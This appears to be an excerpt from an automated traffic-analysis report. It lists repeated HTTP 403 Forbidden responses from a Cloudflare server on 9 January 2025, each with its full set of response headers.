Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:56 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqAPbDxPQcXsCUuhh9vVe%2F10ID9b9hfMiFWVJjE9KmcLo5TG36N93dR17litGahL5Hs0KrovxYb6GRsvRIjw5hc642wtCgZ0FSD1h1AU8qOaFZ7wzJlBb6Hqpp%2BhWHBTbZ9U8cwOsc%2BF0Mu%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1fe3ed6de9a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1614&rtt_var=639&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1809169&cwnd=209&unsent_bytes=0&cid=4d334698cda3eb9d&ts=119&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:57 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8lO%2FYOM5cUS5TUw1AfehM6Quz51YbjoTizqqrWoS7%2FnbA9vKn%2F70hM8FOgBrsUCWHptxw8KAWjkpMRzWLFFGCJ2JPwChl5r35RTWu%2FN6QfHnuOND%2FuJkKd1TMqmbGP1aO64qd9%2BYOscUCEcY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2020a7941ff-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2190&min_rtt=2181&rtt_var=836&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1295474&cwnd=240&unsent_bytes=0&cid=9a29e977c5a74e1b&ts=140&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:58 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=umUiG0qMmEJxjl937DZPLPsoNIEWeUYl%2B129OJvKDXQwjs84RINhrqS6PtgwHEZPRqWD8dHIda84jqK40pjrZUaDlloMq8F9OHiQ9sVHQcdb1rW0OmqebLvZ%2BygqFHI2NBJleSLamgL9aqRS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c205cff8de93-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1636&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1714621&cwnd=248&unsent_bytes=0&cid=dcafdde85260508c&ts=129&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:58 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HhbdHVCNHu%2Fivm9FUumruQ%2FPrVpCh5JvaT3%2FW12keUmYFwCYqK%2B06s3fJkAWXctG%2FBdPN8DdIMbjzdaaCLb9M9U783TET0hANyT8cHNI0js%2FmKJVVYSV7H%2BvQRCpe6Fc86kpfh4vwsxkdf6T"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2099dc743fd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1566&rtt_var=590&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1848101&cwnd=217&unsent_bytes=0&cid=5cac35a96f9bea6e&ts=142&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:59 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BOYN4xkKFzcKhZcFx57pnVK%2FCVu1DZG%2B9ii37a5jTeXAVV91NT0j8awcwmrt8PVzb%2BawoHJI9GWhYCJa4TBXkkonzvM9uczgdqJwh2xblw68zEbQBZZ0N4FuO%2Fgrip7G4aY363QhQ3RSjlem"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c20dfd8943ed-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1566&rtt_var=592&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1839949&cwnd=210&unsent_bytes=0&cid=9b0e33b633204e0c&ts=194&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:00 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4V4M4XG6CwNXyV8KUB%2FHBKZ4q6MifUcqbtB%2FdPjn0VN%2FcBy7WL22uBD%2Fltmr4pDejT38%2ByOHY%2FkBbkl2NxAJAxaC0sicDaVBym9xfvEofs11TXtUteHBFGfWKT6E4zeLpr2ukVYxhklkxx0h"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2121e5c1a2c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2063&min_rtt=2010&rtt_var=792&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1452736&cwnd=174&unsent_bytes=0&cid=6a99f87cf25f14ae&ts=141&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:00 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKLAgFKy1BVDxEoYCHlze52XmHvUs9xJDK8g8R3vaDQwlsY6IGrniIvZqOxFhCsWafsZsF%2Bo9BmpWf9XTc3Q%2BiNuU7hflR%2B7bSrPCve%2BfOdgYFKxwxdhumRqrHLa%2Bo5A%2BZB78PQWXp0FxR8x"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c215f8607271-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1958&rtt_var=747&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1453459&cwnd=225&unsent_bytes=0&cid=f7dd38d147e498c6&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G0GzG872XCovz88l3KqSx049KdywcxRbumSGbaTpoMJqO8YJNPgr%2B9tyw0EYI7592hsYraunqSgpiD%2BC4qV%2BnNU%2FogCru%2FcqvQtuvit4qgXVqGlSYRPK7ZfDJx3v4s%2Bun%2FIsAC6qkf41YPiO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c219bff20f41-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1488&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1938911&cwnd=145&unsent_bytes=0&cid=a9a305bc1a2ac3a1&ts=127&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOIcXYDmKIDukrxoJeNRjeVrffWT196JNd9NObsewHs51wOfaoFv8x135xnA0h9EOVB6VWFJXCEkgUYz4Yet6Kyx1SJt83Uwb1klcULG20fNMdZ%2BIc496b1AGTJIDpFLEPJQURmgxw%2BYL5R6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c21d89be19cb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1890&min_rtt=1884&rtt_var=718&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1511387&cwnd=248&unsent_bytes=0&cid=69cc173e47c905a4&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:02 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0lMdLbg2Yh8jAYdPLe8m0eE%2BYJvVfIjbVrqzJTH0hjr5Feyjn%2BZdLp%2F33MURqq1zTrNuwEHzrzHdUIbguvvo1mIDBVvJ2%2FK%2BCBbxH60GIl9BiojxnLOfGT5m%2FLuyjvdFVvYEzIUIhMECun8o"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2214ab4726e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1927&rtt_var=726&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1505154&cwnd=224&unsent_bytes=0&cid=1a061b1eafecfda3&ts=137&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:03 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uSGAhhwZomgFyviCl4iTNYYD6HEyXZiALOvuoryDrwd3gg9%2B%2FD34UzE9CNbyj%2F0n3A9c89ml%2By1lJSFKtRIuGgosolP9YROoUyayt3dnLOpJ0RB%2FmImpA9xO3KYNIZHXfP8I3rpdhxdA5P8c"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c224f9f2c35e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1455&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1919789&cwnd=59&unsent_bytes=0&cid=06dae848ddde4783&ts=149&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:03 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8s5b7flFtrkdR3y1t1m%2Bap1xEiaDVWLqjsC5TH%2FE%2FiESjCVctAOm2kMVRozH%2BuPTRXcFszLsjwyy3SgG6fCfUgZY0%2B1ihN%2F8Uzb7mDLxdwID2Yxs%2ByROg%2F7JoG2%2BzaZTjmC8R9uDo4wDNQH8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c228a9b772ab-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1958&rtt_var=747&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1452736&cwnd=208&unsent_bytes=0&cid=b72691966784d94f&ts=133&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:04 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oAvPDvvifCrgwSlZ0YS%2BRpGWKM3DTsdLCE8NnBydq7mejeo07f%2F55HPr0Tc2ebyzgfOJhcVV23z8KKAZIVB59KD9q1tSE7GDP3J29bGj6GYIch%2BTodX1CPQtiZ51ErvcssBlWcSzUoo5ZoMd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c22c9f167293-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1943&rtt_var=739&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1471774&cwnd=158&unsent_bytes=0&cid=c45dab2a07ae45cf&ts=151&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:04 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0RiE0an4sR%2Fc8qvZ2LH0iUo3fn3loQVQLIL6Y4uIj633CD38RdW%2FCRyNlTo%2BYs2F8QOfZhVBSc76PZV32T5p236Xi8qnG8M4a8govnzreK2Ic1agosUcqLmOOHzXZnlfU1eVHlXYgeFx%2BwHB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2303ad3c360-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1494&rtt_var=564&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1931216&cwnd=138&unsent_bytes=0&cid=c1084e721b5046c6&ts=119&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t0Hk3h7R%2BrRaB1X538ZOGu9%2BoiOTYvxX9BPp7reIQ0hKgXTMTRaEGQgJ1a1xwjz4CgddtvHCEh17eEkOFeW5eT6oUiSUsu4WUG4IPeMgWa95Z48cYMVCm%2FUEI0bJQ4riikZMK9VOvxBHIaDI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c233f9604308-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=1723&rtt_var=850&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1694718&cwnd=228&unsent_bytes=0&cid=23db61d67e8433e7&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okupo7I2XTbEyuARyz0SIkHUIQvA2NdK82kdf955%2F2kCNeAkvhS6avR%2FwksoGpDNqwh1QV0PRN%2FkfA8umUs7xpJgkaHgCN1X%2BFTjrO4eY2HQJj5Wx%2BkVFf%2BlwXSVs6CsEpuG986%2FRrEPzZSP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c237c981c407-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1649&rtt_var=621&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1760096&cwnd=197&unsent_bytes=0&cid=e14fe00b879c2ab2&ts=137&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3eBTflzltZ4TIIwhSMAtTfH41xxvshiU4dXjDbZnppXgKJOv9pB9AoyWe9Ui8U%2B0DTueKBckPMFPDq1J4i7DGMg%2BruYAgdQPjmxCl60Opj%2B3SMxxsKBsn%2Bto%2FYu1vcMwsGgvubQbL0uVPJNK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c23bbef341e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2539&min_rtt=2538&rtt_var=954&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1145547&cwnd=249&unsent_bytes=0&cid=8a55a54663e6a20a&ts=142&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uanLU5kd%2FiIeibeLPimrHBaW1To8WNxbWII2perKgFCsm6Uz7vdTgIktMYWLzUy3lqt9zxHB2kcOG8BuWRNVWN1QZiNwavKSvhRieqvv5J7jyPWYwmPd%2Fk%2F35Q34Dfx7NyZHNRUrntSDuOih"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c23f8ac2425f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2523&min_rtt=2522&rtt_var=949&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1150965&cwnd=220&unsent_bytes=0&cid=5ebccdf95a30e025&ts=135&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:08 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oECcz%2BOA9CwwiSnq31VYHLk2VHN%2FQ89DfvDGoI7PNbHZ%2B%2FQG5EqZDjR%2BZQ%2FDNa2p%2Bv8ZIqq4nnbM8h0%2BTylwgrmKt56tZVjJ%2FXQq0WicdNBnVe2EhpK11mZfJ1AoKt2Nf8f81Iknw0WWEZ2n"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2436f6c5e6c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2101&min_rtt=2094&rtt_var=791&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1394460&cwnd=239&unsent_bytes=0&cid=fa40cd9dd55acb76&ts=149&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:08 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RXVLUXo%2BxTlFAYIhejWzxJN43iti%2BI3yZapwGSmAJzeG%2BqCOZCnq7KoIQnfEm5nuFGMuRE%2BMmoB0voiOUpiokGyPDT3ovIkUQACCuZcxViSlRL0dfA5Ia774Qcn9WfEJDw7UevoGRaf2%2F837"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2473c9278db-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1910&min_rtt=1906&rtt_var=724&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1502830&cwnd=237&unsent_bytes=0&cid=c78707f0c96a484d&ts=141&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:09 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IHUzI0nOvh8aEGFv63W%2Bl96pRpgfr4E%2Btqu6%2BlIUdvsc1m1gQmS2va%2BtIOvcrKdfGCVMtXxfW2oaK1XAIJzJ8iHhyGLfMo7lJ32e8BRcgH5D%2FOWB8g5S4y70Ok3c4VxAJl4PtvREnitkzzDE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c24af9098c75-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1993&rtt_var=754&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1444829&cwnd=195&unsent_bytes=0&cid=47880fbf31e4535b&ts=128&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:09 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXvfgXfpodtdikqQuRYBe7lqLzDZpz%2BAPj6yR0k%2B%2B8quLFSq1Rx2%2FPWyL39QKwI8Ywtq189VNOCuAUMuxvom3tIO8dKx0Dfc0r0SCbZm4Ottet18V7rSpYUqh1nNAQfm8MudxGdLO171pWWA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c24ecca44257-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2528&min_rtt=2507&rtt_var=983&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1090365&cwnd=215&unsent_bytes=0&cid=e9503e8d2e3875f6&ts=155&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:10 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oxVmSQoyDeRAm0HRF2pDCr2xlJrEUArGd8daTGTya%2FrysZphGYhKPiWpa6KzqUjJnh9u2y4o5B9%2BagBok0mo%2BbMjVo2qUNIrnM3lJBLnJVWHV%2BxUTsUk4H6y7lJgQKo2KR1oaya0GgYjlIxD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2528d257cf6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1954&rtt_var=738&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1476985&cwnd=193&unsent_bytes=0&cid=23658d5d79171b01&ts=146&x=0"
